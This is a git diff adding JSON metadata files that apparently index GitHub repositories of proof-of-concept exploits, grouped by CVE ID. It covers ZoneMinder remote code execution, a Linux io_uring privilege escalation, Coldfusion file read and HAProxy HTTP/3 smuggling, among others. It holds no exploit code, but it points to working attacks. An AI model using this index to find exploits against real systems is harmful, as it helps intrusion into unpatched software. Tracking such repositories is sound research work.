"description": "A vulnerability, which was classified as critical, was found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the component Registration. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228396.", + "fork": false, + "created_at": "2023-05-10T06:07:43Z", + "updated_at": "2023-05-11T02:55:03Z", + "pushed_at": "2023-05-10T06:10:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25950.json b/2023/CVE-2023-25950.json new file mode 100644 index 0000000000..ec89d391bf --- /dev/null +++ b/2023/CVE-2023-25950.json @@ -0,0 +1,42 @@ +[ + { + "id": 673126374, + "name": "HTTP3ONSTEROIDS", + "full_name": "dhmosfunk\/HTTP3ONSTEROIDS", + "owner": { + "login": "dhmosfunk", + "id": 45040001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45040001?v=4", + "html_url": "https:\/\/github.com\/dhmosfunk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhmosfunk\/HTTP3ONSTEROIDS", + "description": "HTTP3ONSTEROIDS - A research on CVE-2023-25950 where HAProxy's HTTP\/3 implementation fails to block a malformed HTTP header field name.", + "fork": false, + "created_at": "2023-07-31T23:57:02Z", + "updated_at": "2024-04-03T09:08:33Z", + "pushed_at": "2024-02-10T04:30:45Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-25950", + "cve-2023-25950-poc", + "dos", + "haproxy", + "http-request-smuggling", + "http3", + "http3onsteroids", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2598.json b/2023/CVE-2023-2598.json new file mode 100644 index 0000000000..bbcd9a683e --- /dev/null +++ b/2023/CVE-2023-2598.json @@ -0,0 +1,95 @@ +[ + { + "id": 719803136, + "name": "io_uring_LPE-CVE-2023-2598", + "full_name": "ysanatomic\/io_uring_LPE-CVE-2023-2598", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2023-2598", + "description": "LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel.", + "fork": false, + "created_at": "2023-11-16T23:41:27Z", + "updated_at": "2024-11-06T16:35:49Z", + "pushed_at": "2023-11-23T18:37:18Z", + "stargazers_count": 90, + "watchers_count": 90, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 90, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 850252202, + "name": "CVE-2023-2598", + "full_name": "cainiao159357\/CVE-2023-2598", + "owner": { + "login": "cainiao159357", + "id": 76136742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76136742?v=4", + "html_url": "https:\/\/github.com\/cainiao159357", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cainiao159357\/CVE-2023-2598", + "description": null, + "fork": false, + "created_at": "2024-08-31T09:14:53Z", + "updated_at": "2024-08-31T09:51:37Z", + "pushed_at": "2024-08-31T09:51:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884497009, + "name": "CVE-2023-2598", + "full_name": "LLfam\/CVE-2023-2598", + "owner": { + "login": "LLfam", + "id": 43279891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43279891?v=4", + "html_url": "https:\/\/github.com\/LLfam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LLfam\/CVE-2023-2598", + "description": null, + "fork": false, + "created_at": "2024-11-06T21:24:43Z", + "updated_at": "2024-11-06T21:27:24Z", + "pushed_at": "2024-11-06T21:27:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2603.json b/2023/CVE-2023-2603.json new file mode 100644 index 0000000000..4bed8b00fe --- /dev/null +++ b/2023/CVE-2023-2603.json @@ -0,0 +1,33 @@ +[ + { + "id": 887105666, + "name": "external_libcap-Android10_r33_CVE-2023-2603", + "full_name": "Pazhanivelmani\/external_libcap-Android10_r33_CVE-2023-2603", + "owner": { + "login": "Pazhanivelmani", + "id": 178174306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178174306?v=4", + "html_url": "https:\/\/github.com\/Pazhanivelmani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pazhanivelmani\/external_libcap-Android10_r33_CVE-2023-2603", + "description": null, + "fork": false, + "created_at": "2024-11-12T07:12:16Z", + "updated_at": "2024-11-12T07:16:43Z", + "pushed_at": "2024-11-12T07:16:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26035.json b/2023/CVE-2023-26035.json new file mode 100644 index 0000000000..1db5d39861 --- /dev/null +++ b/2023/CVE-2023-26035.json @@ -0,0 +1,170 @@ +[ + { + "id": 730370673, + "name": "CVE-2023-26035", + "full_name": "rvizx\/CVE-2023-26035", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-26035", + "description": "Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit", + "fork": false, + "created_at": "2023-12-11T19:23:13Z", + "updated_at": "2024-09-21T19:48:17Z", + "pushed_at": "2024-05-07T03:32:04Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-26035", + "exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730727782, + "name": "zoneminder-snapshots-rce-poc", + "full_name": "m3m0o\/zoneminder-snapshots-rce-poc", + "owner": { + "login": "m3m0o", + "id": 130102748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130102748?v=4", + "html_url": "https:\/\/github.com\/m3m0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3m0o\/zoneminder-snapshots-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Zoneminder's security flaw described in CVE-2023-26035. ", + "fork": false, + "created_at": "2023-12-12T14:44:19Z", + "updated_at": "2024-07-07T17:46:07Z", + "pushed_at": "2024-07-07T17:46:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-26035", + "rce-exploit", + "zoneminder" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731218902, + "name": "CVE-2023-26035", + "full_name": "heapbytes\/CVE-2023-26035", + "owner": { + "login": "heapbytes", + "id": 56447720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56447720?v=4", + "html_url": "https:\/\/github.com\/heapbytes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heapbytes\/CVE-2023-26035", + "description": "POC script for CVE-2023-26035 (zoneminder 1.36.32) ", + "fork": false, + "created_at": "2023-12-13T15:40:24Z", + "updated_at": "2024-10-28T12:18:44Z", + "pushed_at": "2024-09-08T06:55:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-26035", + "exploit", + "poc", + "zoneminder" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735320790, + "name": "CVE-2023-26035", + "full_name": "Yuma-Tsushima07\/CVE-2023-26035", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2023-26035", + "description": "ZoneMinder Snapshots - Unauthenticated", + "fork": false, + "created_at": "2023-12-24T13:37:39Z", + "updated_at": "2023-12-25T14:33:51Z", + "pushed_at": "2023-12-24T13:55:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736382730, + "name": "zoneminder_CVE-2023-26035", + "full_name": "0xfalafel\/zoneminder_CVE-2023-26035", + "owner": { + "login": "0xfalafel", + "id": 4268373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4", + "html_url": "https:\/\/github.com\/0xfalafel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xfalafel\/zoneminder_CVE-2023-26035", + "description": "Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33", + "fork": false, + "created_at": "2023-12-27T18:44:22Z", + "updated_at": "2024-02-15T05:49:30Z", + "pushed_at": "2023-12-27T21:08:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26048.json b/2023/CVE-2023-26048.json new file mode 100644 index 0000000000..e8c5ccc2b7 --- /dev/null +++ b/2023/CVE-2023-26048.json @@ -0,0 +1,64 @@ +[ + { + "id": 712774895, + "name": "jetty_9.4.31_CVE-2023-26048", + "full_name": "Trinadh465\/jetty_9.4.31_CVE-2023-26048", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/jetty_9.4.31_CVE-2023-26048", + "description": null, + "fork": false, + "created_at": "2023-11-01T06:57:10Z", + "updated_at": "2023-11-01T10:21:01Z", + "pushed_at": "2023-11-01T12:09:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723994552, + "name": "Jetty-v9.4.31_CVE-2023-26048", + "full_name": "hshivhare67\/Jetty-v9.4.31_CVE-2023-26048", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty-v9.4.31_CVE-2023-26048", + "description": null, + "fork": false, + "created_at": "2023-11-27T07:19:49Z", + "updated_at": "2023-11-27T07:20:44Z", + "pushed_at": "2023-11-27T07:23:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26049.json b/2023/CVE-2023-26049.json new file mode 100644 index 0000000000..f1c063d506 --- /dev/null +++ b/2023/CVE-2023-26049.json @@ -0,0 +1,33 @@ +[ + { + "id": 723996800, + "name": "Jetty_v9.4.31_CVE-2023-26049", + "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2023-26049", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2023-26049", + "description": null, + "fork": false, + "created_at": "2023-11-27T07:25:34Z", + "updated_at": "2024-03-20T11:38:27Z", + "pushed_at": "2024-03-20T11:39:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26067.json b/2023/CVE-2023-26067.json new file mode 100644 index 0000000000..d30c6ce529 --- /dev/null +++ b/2023/CVE-2023-26067.json @@ -0,0 +1,33 @@ +[ + { + "id": 675834921, + "name": "CVE-2023-26067", + "full_name": "horizon3ai\/CVE-2023-26067", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-26067", + "description": "Lexmark CVE-2023-26067", + "fork": false, + "created_at": "2023-08-07T20:55:15Z", + "updated_at": "2024-07-18T11:40:15Z", + "pushed_at": "2023-08-08T13:54:06Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26136.json b/2023/CVE-2023-26136.json new file mode 100644 index 0000000000..8a8a52d612 --- /dev/null +++ b/2023/CVE-2023-26136.json @@ -0,0 +1,95 @@ +[ + { + "id": 727231092, + "name": "SealSecurityAssignment", + "full_name": "CUCUMBERanOrSNCompany\/SealSecurityAssignment", + "owner": { + "login": "CUCUMBERanOrSNCompany", + "id": 70776104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70776104?v=4", + "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany\/SealSecurityAssignment", + "description": "Researching on the vulnrability CVE-2023-26136", + "fork": false, + "created_at": "2023-12-04T13:01:29Z", + "updated_at": "2024-07-09T21:23:19Z", + "pushed_at": "2023-12-06T10:50:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796819002, + "name": "Open-Source-Seal-Security", + "full_name": "ronmadar\/Open-Source-Seal-Security", + "owner": { + "login": "ronmadar", + "id": 86679386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86679386?v=4", + "html_url": "https:\/\/github.com\/ronmadar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ronmadar\/Open-Source-Seal-Security", + "description": "Fix open source package uses tough-cookie 2.5.0 - CVE-2023-26136,", + "fork": false, + "created_at": "2024-05-06T17:32:10Z", + "updated_at": "2024-05-07T12:18:59Z", + "pushed_at": "2024-05-07T12:18:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851266445, + "name": "SealSecurity_Exam", + "full_name": "m-lito13\/SealSecurity_Exam", + "owner": { + "login": "m-lito13", + "id": 180002370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180002370?v=4", + "html_url": "https:\/\/github.com\/m-lito13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-lito13\/SealSecurity_Exam", + "description": "Fix prototype pollution vulnerability (CVE-2023-26136) for tough-cookie package", + "fork": false, + "created_at": "2024-09-02T18:50:53Z", + "updated_at": "2024-09-04T11:36:16Z", + "pushed_at": "2024-09-04T11:36:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26144.json b/2023/CVE-2023-26144.json new file mode 100644 index 0000000000..4427b15d94 --- /dev/null +++ b/2023/CVE-2023-26144.json @@ -0,0 +1,33 @@ +[ + { + "id": 679233677, + "name": "apollo-koa-minimal", + "full_name": "tadhglewis\/apollo-koa-minimal", + "owner": { + "login": "tadhglewis", + "id": 53756558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53756558?v=4", + "html_url": "https:\/\/github.com\/tadhglewis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadhglewis\/apollo-koa-minimal", + "description": "GraphQL vulnerability disclosure: CVE-2023-26144", + "fork": false, + "created_at": "2023-08-16T11:44:22Z", + "updated_at": "2024-06-05T00:24:49Z", + "pushed_at": "2024-05-30T00:30:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26255.json b/2023/CVE-2023-26255.json new file mode 100644 index 0000000000..0323a7c816 --- /dev/null +++ b/2023/CVE-2023-26255.json @@ -0,0 +1,64 @@ +[ + { + "id": 683213602, + "name": "CVE-2023-26255-Exp", + "full_name": "tucommenceapousser\/CVE-2023-26255-Exp", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-26255-Exp", + "description": null, + "fork": false, + "created_at": "2023-08-25T21:56:48Z", + "updated_at": "2023-08-25T21:59:39Z", + "pushed_at": "2023-08-25T22:00:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685301639, + "name": "CVE-2023-26255-6", + "full_name": "Nian-Stars\/CVE-2023-26255-6", + "owner": { + "login": "Nian-Stars", + "id": 87457806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457806?v=4", + "html_url": "https:\/\/github.com\/Nian-Stars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nian-Stars\/CVE-2023-26255-6", + "description": "Jira plugin STAGIL Navigation FileName的参数任意文件读取漏洞", + "fork": false, + "created_at": "2023-08-30T23:57:10Z", + "updated_at": "2023-08-31T00:03:30Z", + "pushed_at": "2023-08-31T02:16:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26256.json b/2023/CVE-2023-26256.json new file mode 100644 index 0000000000..79ae4f7673 --- /dev/null +++ b/2023/CVE-2023-26256.json @@ -0,0 +1,126 @@ +[ + { + "id": 682354311, + "name": "CVE-2023-26256", + "full_name": "0x7eTeam\/CVE-2023-26256", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2023-26256", + "description": "CVE-2023-26255_POC,CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-08-24T01:57:00Z", + "updated_at": "2024-11-05T19:57:06Z", + "pushed_at": "2023-08-24T02:27:52Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683988114, + "name": "CVE-2023-26256", + "full_name": "xhs-d\/CVE-2023-26256", + "owner": { + "login": "xhs-d", + "id": 87455689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455689?v=4", + "html_url": "https:\/\/github.com\/xhs-d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xhs-d\/CVE-2023-26256", + "description": "CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-08-28T08:00:16Z", + "updated_at": "2023-08-28T08:04:58Z", + "pushed_at": "2023-08-29T14:38:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685129397, + "name": "CVE-2023-26256", + "full_name": "qs119\/CVE-2023-26256", + "owner": { + "login": "qs119", + "id": 143074431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143074431?v=4", + "html_url": "https:\/\/github.com\/qs119", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qs119\/CVE-2023-26256", + "description": null, + "fork": false, + "created_at": "2023-08-30T15:21:00Z", + "updated_at": "2023-08-30T15:29:48Z", + "pushed_at": "2023-08-30T15:29:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685757480, + "name": "CVE-2023-26256", + "full_name": "jcad123\/CVE-2023-26256", + "owner": { + "login": "jcad123", + "id": 87455633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455633?v=4", + "html_url": "https:\/\/github.com\/jcad123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcad123\/CVE-2023-26256", + "description": "CVE-2023-26255_POC,CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-09-01T00:10:36Z", + "updated_at": "2023-09-11T01:38:10Z", + "pushed_at": "2023-09-01T00:54:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26258.json b/2023/CVE-2023-26258.json new file mode 100644 index 0000000000..d4e3241eb1 --- /dev/null +++ b/2023/CVE-2023-26258.json @@ -0,0 +1,33 @@ +[ + { + "id": 659758966, + "name": "CVE-2023-26258-ArcServe", + "full_name": "mdsecactivebreach\/CVE-2023-26258-ArcServe", + "owner": { + "login": "mdsecactivebreach", + "id": 29373540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29373540?v=4", + "html_url": "https:\/\/github.com\/mdsecactivebreach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdsecactivebreach\/CVE-2023-26258-ArcServe", + "description": null, + "fork": false, + "created_at": "2023-06-28T13:51:27Z", + "updated_at": "2024-10-11T19:26:25Z", + "pushed_at": "2024-06-17T13:01:15Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26262.json b/2023/CVE-2023-26262.json new file mode 100644 index 0000000000..35bbd3ae46 --- /dev/null +++ b/2023/CVE-2023-26262.json @@ -0,0 +1,33 @@ +[ + { + "id": 604587204, + "name": "CVE-2023-26262", + "full_name": "istern\/CVE-2023-26262", + "owner": { + "login": "istern", + "id": 909958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/909958?v=4", + "html_url": "https:\/\/github.com\/istern", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/istern\/CVE-2023-26262", + "description": null, + "fork": false, + "created_at": "2023-02-21T11:28:32Z", + "updated_at": "2023-03-08T08:13:20Z", + "pushed_at": "2023-02-21T11:38:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26269.json b/2023/CVE-2023-26269.json new file mode 100644 index 0000000000..e1495b7143 --- /dev/null +++ b/2023/CVE-2023-26269.json @@ -0,0 +1,41 @@ +[ + { + "id": 722756127, + "name": "CVE-2023-26269", + "full_name": "mbadanoiu\/CVE-2023-26269", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-26269", + "description": "CVE-2023-26269: Misconfigured JMX in Apache James", + "fork": false, + "created_at": "2023-11-23T21:55:30Z", + "updated_at": "2023-11-26T12:24:28Z", + "pushed_at": "2023-11-23T22:10:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2023-26269", + "cves", + "local-privilege-escalation", + "mlet", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2636.json b/2023/CVE-2023-2636.json new file mode 100644 index 0000000000..e0ed50c3c1 --- /dev/null +++ b/2023/CVE-2023-2636.json @@ -0,0 +1,33 @@ +[ + { + "id": 652334926, + "name": "CVE-2023-2636", + "full_name": "lukinneberg\/CVE-2023-2636", + "owner": { + "login": "lukinneberg", + "id": 43212073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43212073?v=4", + "html_url": "https:\/\/github.com\/lukinneberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukinneberg\/CVE-2023-2636", + "description": null, + "fork": false, + "created_at": "2023-06-11T20:24:20Z", + "updated_at": "2023-08-27T04:42:36Z", + "pushed_at": "2023-07-26T03:46:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26360.json b/2023/CVE-2023-26360.json new file mode 100644 index 0000000000..0e1aea8506 --- /dev/null +++ b/2023/CVE-2023-26360.json @@ -0,0 +1,126 @@ +[ + { + "id": 735810164, + "name": "CVE-2023-26360", + "full_name": "yosef0x01\/CVE-2023-26360", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-26360", + "description": "Exploit for Arbitrary File Read for CVE-2023-26360 - Adobe Coldfusion", + "fork": false, + "created_at": "2023-12-26T06:26:01Z", + "updated_at": "2024-06-22T03:24:03Z", + "pushed_at": "2024-06-22T03:23:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800457140, + "name": 